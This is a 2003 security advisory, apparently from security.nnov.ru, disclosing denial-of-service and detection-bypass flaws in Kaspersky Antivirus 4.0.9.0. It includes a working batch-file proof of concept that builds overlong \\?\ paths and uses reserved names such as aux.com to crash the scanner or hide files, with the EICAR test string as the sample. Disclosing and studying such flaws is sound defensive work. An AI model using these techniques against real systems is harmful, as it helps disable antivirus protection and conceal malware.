11th Feb 2003 [SBWID-5981]
COMMAND
Kaspersky Antivirus DoS
SYSTEMS AFFECTED
Kaspersky Antivirus 4.0.9.0 (Server and Workstation version on Windows
NT 4.0 and Windows 2000)
PROBLEM
In ZARAZA [[email protected]] advisory :
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A }
+-------------o66o--+ /
|/
--snip--
Few vulnerabilities were identified. Most serious allows user to crash
antiviral server remotely (write access to any directory on remote
server is required).
1. Long path crash
2. Long path prevents malware from detection
3. Special name prevents malware from detection
Details:
========
1. Long path crash
NTFS file system allows to create paths of almost unlimited length. But
Windows API does not allow path longer than 256 bytes. To prevent
Windows API from checking requested path \\?\ prefix may be used to
filename. This is documented feature of Windows API. Paths longer than
256 characters will cause KAV monitor service to crash or hang with
100% CPU usage. Possibility of code execution is not researched.
2. Long path prevents malware from detection
Long path will also prevent malware from detection by antiviral
scanner.
3. Special name prevents malware from detection
It's possible to create NTFS file with name like aux.vbs or aux.com.
Malware in this file will not be detected.
Exploit:
========
This .bat file demonstrates vulnerability.
1,2 Long path crash & Long path prevents malware from detection
@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com
3. Special name prevents malware from detection
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\aux.com
--snap--
SOLUTION
None yet